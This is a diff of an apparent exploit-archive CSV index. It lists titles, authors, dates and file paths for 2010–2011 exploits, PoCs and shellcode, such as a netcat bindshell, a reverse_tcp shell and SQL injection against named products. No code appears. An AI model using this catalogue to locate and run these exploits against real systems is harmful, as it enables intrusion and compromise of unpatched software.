Music Editor - (.cda) Denial of Service",2011-02-28,"AtT4CKxT3rR0r1ST ",windows,dos,0 16256,platforms/php/webapps/16256.txt,"DO-CMS - Multiple SQL Injection Vulnerabilities",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 16257,platforms/php/webapps/16257.txt,"SnapProof (page.php) SQL Injection Vulnerability",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -14034,14 +14068,12 @@ id,file,description,date,author,platform,type,port 16261,platforms/multiple/dos/16261.txt,"PHP Exif Extension 'exif_read_data()' Function Remote DoS",2011-02-28,"_ikki and paradoxengine",multiple,dos,0 16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation Vulnerability PoC (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0 16263,platforms/linux/dos/16263.c,"Linux Kernel <= 2.6.37 - Local Kernel Denial of Service",2011-03-02,prdelka,linux,dos,0 -16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow Exploit",2011-03-02,"C4SS!0 G0M3S",windows,local,0 16265,platforms/php/webapps/16265.txt,"Readmore Systems Script SQL Injection Vulnerability",2011-03-02,"vBzone and Zooka and El3arby",php,webapps,0 16266,platforms/php/webapps/16266.txt,"Quicktech SQL Injection Vulnerability",2011-03-02,eXeSoul,php,webapps,0 16267,platforms/php/webapps/16267.txt,"bitweaver 2.8.0 - Multiple Vulnerabilities",2011-03-02,lemlajt,php,webapps,0 16268,platforms/php/webapps/16268.pl,"cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability",2011-03-02,DSecurity,php,webapps,0 16270,platforms/linux/dos/16270.c,"vsftpd 2.3.2 - Denial of Service Vulnerability",2011-03-02,"Maksymilian Arciemowicz",linux,dos,0 16271,platforms/ios/remote/16271.txt,"iOS TIOD 1.3.3 - Directory Traversal",2011-03-03,"R3d@l3rt, H@ckk3y",ios,remote,0 -16272,platforms/php/webapps/16272.txt,"Limelight Software (article.php) SQL Injection Vulnerability",2011-03-04,eXeSoul,php,webapps,0 16273,platforms/php/webapps/16273.php,"PHP Speedy <= 0.5.2 Wordpress Plugin - (admin_container.php) Remote Code Execution Exploit",2011-03-04,mr_me,php,webapps,0 16274,platforms/jsp/webapps/16274.pl,"JBoss Application Server Remote Exploit",2011-03-04,kingcope,jsp,webapps,0 16275,platforms/hardware/remote/16275.txt,"Comtrend ADSL Router CT-5367 C01_R12 - Remote Root",2011-03-04,"Todor Donev",hardware,remote,0 @@ -14101,7 +14133,7 @@ id,file,description,date,author,platform,type,port 16331,platforms/windows/remote/16331.rb,"Veritas Backup Exec Name Service Overflow",2010-06-22,metasploit,windows,remote,0 16332,platforms/windows/remote/16332.rb,"Veritas Backup Exec Windows Remote Agent Overflow",2010-07-03,metasploit,windows,remote,0 16333,platforms/windows/remote/16333.rb,"Windows Media Services ConnectFunnel Stack Buffer Overflow",2010-04-28,metasploit,windows,remote,0 -16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport Overflow",2010-09-20,metasploit,windows,remote,0 +16334,platforms/windows/remote/16334.rb,"Microsoft Private Communications Transport - Overflow",2010-09-20,metasploit,windows,remote,0 16335,platforms/windows/remote/16335.rb,"WinComLPD <= 3.0.2 - Buffer Overflow",2010-06-22,metasploit,windows,remote,0 16336,platforms/windows/remote/16336.rb,"NIPrint LPD Request Overflow",2010-12-25,metasploit,windows,remote,0 16337,platforms/windows/remote/16337.rb,"Hummingbird Connectivity 10 SP5 LPD Buffer Overflow",2010-09-20,metasploit,windows,remote,0 @@ -14319,7 +14351,7 @@ id,file,description,date,author,platform,type,port 16549,platforms/windows/remote/16549.rb,"Internet Explorer isComponentInstalled Overflow",2010-05-09,metasploit,windows,remote,0 16550,platforms/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker",2010-09-24,metasploit,windows,remote,0 16551,platforms/windows/remote/16551.rb,"Internet Explorer CSS SetUserClip Memory Corruption",2011-01-20,metasploit,windows,remote,0 -16552,platforms/windows/remote/16552.rb,"Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method",2010-09-20,metasploit,windows,remote,0 +16552,platforms/windows/remote/16552.rb,"Husdawg_ LLC. System Requirements Lab ActiveX Unsafe Method",2010-09-20,metasploit,windows,remote,0 16553,platforms/windows/remote/16553.rb,"BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16554,platforms/windows/remote/16554.rb,"America Online ICQ ActiveX Control Arbitrary File Download and Execute",2010-11-24,metasploit,windows,remote,0 16555,platforms/windows/remote/16555.rb,"Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption",2010-07-12,metasploit,windows,remote,0 @@ -14527,7 +14559,7 @@ id,file,description,date,author,platform,type,port 16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 Accept-Language Overflow",2010-09-20,metasploit,windows,remote,8300 16758,platforms/windows/remote/16758.rb,"SAP DB 7.4 WebTools Buffer Overflow",2010-07-16,metasploit,windows,remote,9999 16759,platforms/win32/remote/16759.rb,"SHTTPD <= 1.34 URI-Encoded POST Request Overflow (Win32)",2010-05-09,metasploit,win32,remote,0 -16760,platforms/windows/remote/16760.rb,"Private Wire Gateway Buffer Overflow",2010-04-30,metasploit,windows,remote,80 +16760,platforms/windows/remote/16760.rb,"Private Wire Gateway - Buffer Overflow",2010-04-30,metasploit,windows,remote,80 16761,platforms/windows/remote/16761.rb,"BadBlue 2.5 EXT.dll Buffer Overflow",2010-07-07,metasploit,windows,remote,80 16762,platforms/windows/remote/16762.rb,"BEA WebLogic JSESSIONID Cookie Value Overflow",2010-07-03,metasploit,windows,remote,80 16763,platforms/win32/remote/16763.rb,"Icecast <= 2.0.1 - Header Overwrite (Win32)",2010-04-30,metasploit,win32,remote,8000 @@ -14541,7 +14573,7 @@ id,file,description,date,author,platform,type,port 16771,platforms/windows/remote/16771.rb,"EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow",2010-08-17,metasploit,windows,remote,8080 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server Authentication Request Handling Buffer Overflow",2010-08-06,metasploit,windows,remote,80 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server Host Header Overflow",2010-05-09,metasploit,windows,remote,8028 -16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow",2010-10-12,metasploit,windows,remote,0 +16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53_ 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow",2010-10-12,metasploit,windows,remote,0 16775,platforms/windows/webapps/16775.rb,"Rhinosoft Serv-U Session Cookie Buffer Overflow",2010-03-10,metasploit,windows,webapps,0 16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin USER Buffer Overflow",2010-02-15,metasploit,windows,remote,0 16777,platforms/windows/remote/16777.rb,"Free Download Manager Remote Control Server Buffer Overflow",2010-07-13,metasploit,windows,remote,80 @@ -14655,7 +14687,7 @@ id,file,description,date,author,platform,type,port 16886,platforms/cgi/webapps/16886.rb,"AWStats (6.4-6.5) migrate Remote Command Execution",2010-07-03,metasploit,cgi,webapps,0 16887,platforms/linux/remote/16887.rb,"HP Openview connectedNodes.ovpl Remote Command Execution",2010-07-03,metasploit,linux,remote,0 16888,platforms/linux/remote/16888.rb,"SquirrelMail PGP Plugin command execution (SMTP)",2010-08-25,metasploit,linux,remote,0 -16889,platforms/linux/webapps/16889.rb,"Redmine SCM Repository 0.9.x, 1.0.x - Arbitrary Command Execution",2011-01-08,metasploit,linux,webapps,0 +16889,platforms/linux/webapps/16889.rb,"Redmine SCM Repository 0.9.x / 1.0.x - Arbitrary Command Execution",2011-01-08,metasploit,linux,webapps,0 16890,platforms/php/webapps/16890.rb,"phpBB viewtopic.php Arbitrary Code Execution",2010-07-03,metasploit,php,webapps,0 16891,platforms/cgi/webapps/16891.rb,"QuickTime Streaming Server parse_xml.cgi Remote Execution",2010-07-03,metasploit,cgi,webapps,0 16892,platforms/php/webapps/16892.rb,"TWiki History TWikiUsers rev Parameter Command Execution",2010-07-03,metasploit,php,webapps,0 @@ -14696,6 +14728,7 @@ id,file,description,date,author,platform,type,port 16929,platforms/aix/dos/16929.rb,"AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 - Buffer Overflow",2010-11-11,metasploit,aix,dos,0 16930,platforms/aix/remote/16930.rb,"ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)",2010-11-11,metasploit,aix,remote,0 16931,platforms/php/webapps/16931.html,"N-13 News 4.0 - CSRF Vulnerability (Add Admin)",2011-03-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 +16946,platforms/php/webapps/16946.txt,"RuubikCMS 1.0.3 - Multiple Vulnerabilities",2011-03-08,IRCRASH,php,webapps,0 16933,platforms/php/webapps/16933.txt,"Quick Polls Local File Inclusion and Deletion Vulnerabilities",2011-03-06,"Mark Stanislav",php,webapps,0 16934,platforms/php/webapps/16934.pl,"EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability",2011-03-06,DSecurity,php,webapps,0 16935,platforms/php/webapps/16935.txt,"bacula-web 1.3.x - 5.0.3 - Multiple Vulnerabilities",2011-03-07,b0telh0,php,webapps,0 @@ -14709,7 +14742,6 @@ id,file,description,date,author,platform,type,port 16943,platforms/windows/dos/16943.pl,"Movavi VideoSuite 8.0 SlideShow jpg Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 16944,platforms/windows/dos/16944.pl,"Movavi VideoSuite 8.0 Movie Editor avi Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 16945,platforms/hardware/dos/16945.pl,"Nokia N97 m3u Playlist Crash PoC",2011-03-08,KedAns-Dz,hardware,dos,0 -16946,platforms/php/webapps/16946.txt,"RuubikCMS 1.0.3 - Multiple Vulnerabilities",2011-03-08,IRCRASH,php,webapps,0 16947,platforms/php/webapps/16947.txt,"GRAND Flash Album Gallery 0.55 Wordpress Plugin Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0 16948,platforms/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection Vulnerability",2011-03-09,Shamus,php,webapps,0 16949,platforms/php/webapps/16949.php,"maian weblog <= 4.0 - Remote Blind SQL Injection",2011-03-09,mr_me,php,webapps,0 @@ -14735,7 +14767,7 @@ id,file,description,date,author,platform,type,port 16971,platforms/windows/local/16971.py,"ABBS Audio Media Player Buffer Overflow Exploit (M3U/LST)",2011-03-14,Rh0,windows,local,0 16972,platforms/ios/remote/16972.txt,"iOS Checkview 1.1 - Directory Traversal",2011-03-14,kim@story,ios,remote,0 16973,platforms/linux/dos/16973.c,"Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit",2011-03-14,prdelka,linux,dos,0 -16974,platforms/android/remote/16974.html,"Android 2.0 ,2.1, 2.1.1 - WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",android,remote,0 +16974,platforms/android/remote/16974.html,"Android 2.0 / 2.1 /2.1.1 - WebKit Use-After-Free Exploit",2011-03-14,"MJ Keith",android,remote,0 16975,platforms/asp/webapps/16975.txt,"SmarterMail 8.0 - Multiple XSS Vulnerabilities",2011-03-14,"Hoyt LLC Research",asp,webapps,0 16976,platforms/windows/local/16976.pl,"ABBS Audio Media Player 3.0 - (.lst) Buffer Overflow Exploit (SEH)",2011-03-14,h1ch4m,windows,local,0 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - (.fcd) Buffer Overflow Exploit",2011-03-14,h1ch4m,windows,local,0 @@ -14830,6 +14862,7 @@ id,file,description,date,author,platform,type,port 17080,platforms/php/webapps/17080.txt,"Bigace 2.7.5 - Remote File Upload Vulnerability",2011-03-30,Net.Edit0r,php,webapps,0 17081,platforms/asp/webapps/17081.txt,"CosmoQuest Login Bypass Vulnerability",2011-03-30,Net.Edit0r,asp,webapps,0 17083,platforms/linux/local/17083.pl,"HT Editor 2.0.18 File Opening Stack Overflow",2011-03-30,ZadYree,linux,local,0 +17145,platforms/windows/dos/17145.pl,"Vallen Zipper 2.30 - (.ZIP) Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos,0 17084,platforms/php/webapps/17084.txt,"Andy's PHP Knowledgebase 0.95.2 (viewusers.php) SQL Injection",2011-03-30,"Mark Stanislav",php,webapps,0 17085,platforms/php/webapps/17085.txt,"PHPBoost 3.0 - Remote Download Backup Vulnerability",2011-03-31,KedAns-Dz,php,webapps,0 17086,platforms/windows/local/17086.pl,"Word List Builder Buffer Overflow Exploit (SEH)",2011-04-01,h1ch4m,windows,local,0 @@ -14841,6 +14874,7 @@ id,file,description,date,author,platform,type,port 17094,platforms/php/webapps/17094.html,"Allomani Web Links 1.0 - CSRF Vulnerability (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17095,platforms/php/webapps/17095.html,"Allomani Audio and Video Library 2.7.0 - CSRF Vulnerability (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 17096,platforms/php/webapps/17096.html,"Allomani Super Multimedia Library 2.5.0 - CSRF Vulnerability (Add Admin)",2011-04-01,"AtT4CKxT3rR0r1ST ",php,webapps,0 +17123,platforms/php/webapps/17123.txt,"Tutorialms 1.4 (show) - Remote SQL Injection Vulnerability",2011-04-05,LiquidWorm,php,webapps,0 17097,platforms/bsd/dos/17097.c,"IPComp encapsulation pre-auth kernel memory corruption",2011-04-01,"Tavis Ormandy",bsd,dos,0 17098,platforms/php/webapps/17098.txt,"InTerra Blog Machine 1.84 - XSS Vulnerability",2011-04-01,"High-Tech Bridge SA",php,webapps,0 17099,platforms/php/webapps/17099.txt,"Feng Office 1.7.3.3 - CSRF Vulnerability",2011-04-01,"High-Tech Bridge SA",php,webapps,0 @@ -14853,6 +14887,8 @@ id,file,description,date,author,platform,type,port 17106,platforms/php/webapps/17106.txt,"Rash CMS SQL Injection Vulnerability",2011-04-03,keracker,php,webapps,0 17107,platforms/php/webapps/17107.txt,"Banner Ad Management Script SQL Injection Vulnerability",2011-04-03,Egyptian.H4x0rz,php,webapps,0 17108,platforms/php/webapps/17108.txt,"OpenCart 1.4.9 - Multiple Local File Inclusion Vulnerabilities",2011-04-03,KedAns-Dz,php,webapps,0 +17432,platforms/sh4/shellcode/17432.c,"Linux/SuperH - sh4 - setuid(0) - chmod(""/etc/shadow""_ 0666) - exit(0) (43 bytes)",2011-06-22,"Jonathan Salwan",sh4,shellcode,0 +17431,platforms/php/webapps/17431.txt,"Same Team E-shop manager - SQL Injection Exploit",2011-06-22,"Number 7",php,webapps,0 17110,platforms/php/webapps/17110.txt,"DoceboLms 4.0.4 - Multiple Stored XSS Vulnerabilities",2011-04-04,LiquidWorm,php,webapps,0 17111,platforms/multiple/webapps/17111.txt,"Yaws-Wiki 1.88-1 (Erlang) Stored and Reflective XSS Vulnerabilities",2011-04-04,"Michael Brooks",multiple,webapps,0 17112,platforms/hardware/webapps/17112.txt,"Encore ENPS-2012 - Cross-Site Scripting Vulnerability",2011-04-04,b0telh0,hardware,webapps,0 @@ -14864,25 +14900,28 @@ id,file,description,date,author,platform,type,port 17118,platforms/php/webapps/17118.txt,"OpenEMR 4.0.0 - Multiple Vulnerabilities",2011-04-05,"AutoSec Tools",php,webapps,0 17119,platforms/php/webapps/17119.txt,"Wordpress Plugin Custom Pages 0.5.0.1 - LFI Vulnerability",2011-04-05,"AutoSec Tools",php,webapps,0 17120,platforms/multiple/dos/17120.c,"GNU glibc < 2.12.2 - 'fnmatch()' Function Stack Corruption Vulnerability",2011-02-25,"Simon Berry-Byrne",multiple,dos,0 -17123,platforms/php/webapps/17123.txt,"Tutorialms 1.4 (show) - Remote SQL Injection Vulnerability",2011-04-05,LiquidWorm,php,webapps,0 +17181,platforms/linux/remote/17181.pl,"FiSH-irssi 0.99 - Evil ircd Buffer Overflow",2011-04-17,"Caleb James DeLisle",linux,remote,0 17124,platforms/windows/local/17124.pl,"MPlayer (r33064 Lite) Buffer Overflow + ROP Exploit",2011-04-06,Nate_M,windows,local,0 17125,platforms/php/webapps/17125.txt,"Dream Vision Technologies Web Portal SQL Injection Vulnerability",2011-04-06,eXeSoul,php,webapps,0 17126,platforms/php/webapps/17126.html,"Graugon Forum 1.3 - SQL Injection Vulnerability",2011-04-06,"AutoSec Tools",php,webapps,0 17127,platforms/php/webapps/17127.txt,"eyeos 2.3 - Multiple Vulnerabilities",2011-04-06,"AutoSec Tools",php,webapps,0 17128,platforms/php/webapps/17128.txt,"greenpants 0.1.7 - Multiple Vulnerabilities",2011-04-06,"Ptrace Security",php,webapps,0 17129,platforms/php/webapps/17129.txt,"S40 CMS 0.4.2b - LFI Vulnerability",2011-04-07,Osirys,php,webapps,0 +17196,platforms/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,windows,local,0 17132,platforms/php/webapps/17132.py,"Joomla! com_virtuemart <= 1.1.7 - Blind SQL Injection Exploit",2011-04-08,"TecR0c and mr_me",php,webapps,0 17133,platforms/windows/dos/17133.c,"Microsoft Windows XP - AFD.sys Local Kernel DoS Exploit",2011-04-08,"Lufeng Li",windows,dos,0 17134,platforms/php/webapps/17134.txt,"phpcollab 2.5 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 17135,platforms/php/webapps/17135.txt,"viscacha 0.8.1 - Multiple Vulnerabilities",2011-04-08,"High-Tech Bridge SA",php,webapps,0 17136,platforms/php/webapps/17136.txt,"Joomla JCE Component (com_jce) Blind SQL Injection Vulnerability",2011-04-09,eidelweiss,php,webapps,0 17137,platforms/php/webapps/17137.txt,"Nooms CMS 1.1.1 - CSRF",2011-04-09,loneferret,php,webapps,0 +17178,platforms/php/webapps/17178.txt,"Blue Hat Sensitive Database Disclosure Vulnerability SQLi",2011-04-16,^Xecuti0N3r,php,webapps,0 +17179,platforms/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection Vulnerability",2011-04-16,^Xecuti0N3r,php,webapps,0 +17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS SQL Injection Vulnerability",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0 17140,platforms/multiple/dos/17140.txt,"Libmodplug ReadS3M Stack Overflow",2011-04-09,"SEC Consult",multiple,dos,0 17141,platforms/php/webapps/17141.txt,"Point Market System 3.1x vbulletin plugin SQLi Vulnerability",2011-04-10,Net.Edit0r,php,webapps,0 17142,platforms/windows/dos/17142.py,"IrfanView 4.28 - ICO With Transparent Colour DoS & RDoS",2011-04-10,BraniX,windows,dos,0 17143,platforms/windows/dos/17143.py,"IrfanView 4.28 - ICO Without Transparent Colour DoS & RDoS",2011-04-10,BraniX,windows,dos,0 17144,platforms/windows/local/17144.pl,"MikeyZip 1.1 - (.zip) File Buffer Overflow",2011-04-10,"C4SS!0 G0M3S",windows,local,0 -17145,platforms/windows/dos/17145.pl,"Vallen Zipper 2.30 - (.ZIP) Heap Overflow",2011-04-11,"C4SS!0 G0M3S",windows,dos,0 17146,platforms/php/webapps/17146.txt,"K-Links - Link Directory Script SQL Injection Vulnerability",2011-04-11,R3d-D3V!L,php,webapps,0 17147,platforms/linux/local/17147.txt,"tmux - '-S' Option Incorrect SetGID Privilege Escalation Vulnerability",2011-04-11,ph0x90bic,linux,local,0 17148,platforms/multiple/remote/17148.rb,"Zend Server Java Bridge Arbitrary Java Code Execution",2011-04-05,metasploit,multiple,remote,10001 @@ -14912,24 +14951,19 @@ id,file,description,date,author,platform,type,port 17175,platforms/windows/remote/17175.rb,"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability",2011-04-16,metasploit,windows,remote,0 17176,platforms/asp/webapps/17176.txt,"SoftXMLCMS Shell Upload Vulnerability",2011-04-16,Alexander,asp,webapps,0 17177,platforms/windows/local/17177.rb,"Microsoft Word 2003 - Record Parsing Buffer Overflow (meta) (MS09-027)",2011-04-16,"Andrew King",windows,local,0 -17178,platforms/php/webapps/17178.txt,"Blue Hat Sensitive Database Disclosure Vulnerability SQLi",2011-04-16,^Xecuti0N3r,php,webapps,0 -17179,platforms/php/webapps/17179.txt,"Bedder CMS - Blind SQL Injection Vulnerability",2011-04-16,^Xecuti0N3r,php,webapps,0 -17180,platforms/php/webapps/17180.txt,"Shape Web Solutions CMS SQL Injection Vulnerability",2011-04-16,"Ashiyane Digital Security Team",php,webapps,0 -17181,platforms/linux/remote/17181.pl,"FiSH-irssi 0.99 - Evil ircd Buffer Overflow",2011-04-17,"Caleb James DeLisle",linux,remote,0 17183,platforms/php/webapps/17183.txt,"osPHPSite SQL Injection Vulnerability",2011-04-17,"vir0e5 ",php,webapps,0 +17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0 +17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP+ASLR bypass)",2011-04-19,Abysssec,windows,remote,0 17185,platforms/windows/local/17185.py,"Wireshark 1.4.1-1.4.4 - SEH Overflow Exploit",2011-04-18,sickness,windows,local,0 17186,platforms/windows/local/17186.rb,"Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow",2011-04-19,metasploit,windows,local,0 -17187,platforms/windows/remote/17187.txt,"Adobe Flash Player < 10.1.53.64 - Action Script Type Confusion Exploit (DEP+ASLR bypass)",2011-04-19,Abysssec,windows,remote,0 -17188,platforms/windows/dos/17188.txt,"IBM Tivoli Directory Server SASL Bind Request Remote Code Execution",2011-04-19,"Francis Provencher",windows,dos,0 +17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injection Vunerabilities",2011-04-22,NoNameMT,php,webapps,0 +17198,platforms/php/webapps/17198.txt,"360 Web Manager 3.0 - Multiple Vulnerabilities",2011-04-22,"Ignacio Garrido",php,webapps,0 17190,platforms/php/webapps/17190.txt,"dalbum 1.43 - Multiple Vulnerabilities",2011-04-19,"High-Tech Bridge SA",php,webapps,0 17191,platforms/php/webapps/17191.txt,"Ultimate eShop Error Based SQL Injection Vulnerability",2011-04-20,Romka,php,webapps,0 17192,platforms/php/webapps/17192.html,"docuFORM Mercury WebApp 6.16a/5.20 - Multiple XSS Vulnerabilities",2011-04-20,LiquidWorm,php,webapps,0 17193,platforms/php/webapps/17193.html,"SocialCMS1.0.2 - Multiple CSRF Vulnerabilities",2011-04-20,"vir0e5 ",php,webapps,0 17194,platforms/linux/shellcode/17194.txt,"Linux/x86 - netcat bindshell port 6666 - 69 bytes",2011-04-21,"Jonathan Salwan",linux,shellcode,0 17195,platforms/windows/remote/17195.rb,"Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow",2011-04-19,metasploit,windows,remote,0 -17196,platforms/windows/local/17196.html,"Gesytec ElonFmt ActiveX 1.1.14 (ElonFmt.ocx) pid Item Buffer Overflow (SEH)",2011-04-21,LiquidWorm,windows,local,0 -17197,platforms/php/webapps/17197.txt,"First Escort Marketing CMS - Multiple SQL Injection Vunerabilities",2011-04-22,NoNameMT,php,webapps,0 -17198,platforms/php/webapps/17198.txt,"360 Web Manager 3.0 - Multiple Vulnerabilities",2011-04-22,"Ignacio Garrido",php,webapps,0 17199,platforms/unix/remote/17199.rb,"Spreecommerce < 0.50.0 - Arbitrary Command Execution",2011-04-21,metasploit,unix,remote,0 17200,platforms/php/webapps/17200.txt,"ZenPhoto 1.4.0.3 x-forwarded-for HTTP Header presisitent XSS",2011-04-22,Saif,php,webapps,0 17201,platforms/multiple/dos/17201.php,"PHP phar extension 1.1.1 Heap Overflow",2011-04-22,"Alexander Gavrun",multiple,dos,0 @@ -14939,8 +14973,6 @@ id,file,description,date,author,platform,type,port 17205,platforms/php/webapps/17205.txt,"4images 1.7.9 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 17206,platforms/php/webapps/17206.txt,"Realmarketing CMS - Multiple SQL Injection Vulnerabilities",2011-04-22,^Xecuti0N3r,php,webapps,0 17207,platforms/php/webapps/17207.txt,"ajax category dropdown wordpress plugin 0.1.5 - Multiple Vulnerabilities",2011-04-22,"High-Tech Bridge SA",php,webapps,0 -17209,platforms/php/webapps/17209.txt,"SoftMP3 SQL Injection Vulnerability",2011-04-24,mArTi,php,webapps,0 -17210,platforms/windows/local/17210.rb,"eZip Wizard 3.0 - Stack Buffer Overflow",2011-04-25,metasploit,windows,local,0 17211,platforms/php/webapps/17211.txt,"mySeatXT 0.1781 SQL Injection Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 17212,platforms/php/webapps/17212.txt,"OrangeHRM 2.6.3 (PluginController.php) Local File Inclusion Vulnerability",2011-04-25,"AutoSec Tools",php,webapps,0 17213,platforms/php/webapps/17213.txt,"phpmychat plus 1.93 - Multiple Vulnerabilities",2011-04-25,"AutoSec Tools",php,webapps,0 @@ -14953,7 +14985,7 @@ id,file,description,date,author,platform,type,port 17220,platforms/php/webapps/17220.txt,"eyeos <= 1.9.0.2 - Stored XSS Vulnerability using image files",2011-04-28,"Alberto Ortega",php,webapps,0 17221,platforms/php/webapps/17221.txt,"kusaba x <= 0.9.1 - Multiple Vulnerabilities",2011-04-28,"Emilio Pinna",php,webapps,0 17222,platforms/linux/dos/17222.c,"libmodplug <= 0.8.8.2 - (.abc) Stack-Based Buffer Overflow PoC",2011-04-28,epiphant,linux,dos,0 -17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0, 9.1, 9.2, 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0 +17223,platforms/windows/local/17223.pl,"NetOp Remote Control 8.0 / 9.1 / 9.2 / 9.5 - Buffer Overflow",2011-04-28,chap0,windows,local,0 17224,platforms/osx/shellcode/17224.s,"OSX/Intel reverse_tcp shell x86_64 - 131 bytes",2011-04-29,hammackj,osx,shellcode,0 17225,platforms/windows/local/17225.rb,"Subtitle Processor 7.7.1 - (.m3u) SEH Unicode Buffer Overflow",2011-04-28,metasploit,windows,local,0 17226,platforms/php/webapps/17226.txt,"phpGraphy 0.9.13b - Multiple Vulnerabilities",2011-04-29,"High-Tech Bridge SA",php,webapps,0 @@ -14962,15 +14994,19 @@ id,file,description,date,author,platform,type,port 17229,platforms/windows/local/17229.rb,"MJM QuickPlayer 1.00 beta 60a / QuickPlayer 2010 - (.s3m) Stack Buffer Overflow",2011-04-30,metasploit,windows,local,0 17230,platforms/windows/local/17230.rb,"MJM Core Player 2011 - (.s3m) Stack Buffer Overflow",2011-04-30,metasploit,windows,local,0 17231,platforms/php/webapps/17231.txt,"Parnian Opendata CMS SQL Injection Vulnerability",2011-05-02,Alexander,php,webapps,0 +17243,platforms/windows/remote/17243.txt,"SPlayer <= 3.7 (build 2055) Buffer Overflow Exploit",2011-05-04,xsploitedsec,windows,remote,0 +17317,platforms/windows/local/17317.rb,"VisiWave VWR File Parsing Trusted Pointer Vulnerability",2011-05-23,metasploit,windows,local,0 +17318,platforms/multiple/local/17318.php,"PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability",2011-05-25,"Marek Kroemeke",multiple,local,0 +17323,platforms/windows/shellcode/17323.c,"Allwin WinExec add new local administrator + ExitProcess Shellcode",2011-05-25,RubberDuck,windows,shellcode,0 +17319,platforms/php/webapps/17319.txt,"Tickets 2.13 SQL Injection Vulnerability",2011-05-25,"AutoSec Tools",php,webapps,0 17235,platforms/php/webapps/17235.html,"Exponent CMS 2.0 Beta 1.1 - CSRF Add Administrator Account PoC",2011-05-02,outlaw.dll,php,webapps,0 17236,platforms/php/webapps/17236.txt,"Travel411 SQL Injection Vulnerability",2011-05-02,Caddy-Dz,php,webapps,0 17237,platforms/php/webapps/17237.txt,"Horizon Web Builder (fshow.php) SQL Injection Vulnerability",2011-05-03,"Iolo Morganwg",php,webapps,0 17238,platforms/php/webapps/17238.html,"Front Accounting 2.3.4 - CSRF Vulnerability",2011-05-03,"AutoSec Tools",php,webapps,0 17239,platforms/php/webapps/17239.txt,"Time and Expense Management System Multiple Vulnerabilities",2011-05-03,"AutoSec Tools",php,webapps,0 17240,platforms/windows/remote/17240.html,"ICONICS WebHMI - ActiveX Stack Overflow",2011-05-03,"sgb and bls",windows,remote,0 -17242,platforms/asp/webapps/17242.txt,"Sothink DHTML Menu SQL Injection Vulnerability",2011-05-04,Caddy-Dz,asp,webapps,0 -17243,platforms/windows/remote/17243.txt,"SPlayer <= 3.7 (build 2055) Buffer Overflow Exploit",2011-05-04,xsploitedsec,windows,remote,0 17244,platforms/hardware/remote/17244.txt,"ZyWALL USG - Appliance Multiple Vulnerabilities",2011-05-04,"RedTeam Pentesting",hardware,remote,0 +17242,platforms/asp/webapps/17242.txt,"Sothink DHTML Menu SQL Injection Vulnerability",2011-05-04,Caddy-Dz,asp,webapps,0 17248,platforms/php/webapps/17248.txt,"PHPDug 2.0.0 - Multiple Vulnerabilities",2011-05-06,"High-Tech Bridge SA",php,webapps,0 17250,platforms/php/webapps/17250.txt,"phpThumb 'phpThumbDebug' Information Disclosure",2011-05-06,mook,php,webapps,0 17251,platforms/php/webapps/17251.html,"VCalendar 1.1.5 - CSRF Vulnerability",2011-05-06,"High-Tech Bridge SA",php,webapps,0 @@ -14983,12 +15019,12 @@ id,file,description,date,author,platform,type,port 17268,platforms/windows/remote/17268.rb,"SPlayer 3.7 Content-Type Buffer Overflow",2011-05-11,metasploit,windows,remote,0 17269,platforms/windows/remote/17269.rb,"ICONICS WebHMI ActiveX Buffer Overflow",2011-05-10,metasploit,windows,remote,0 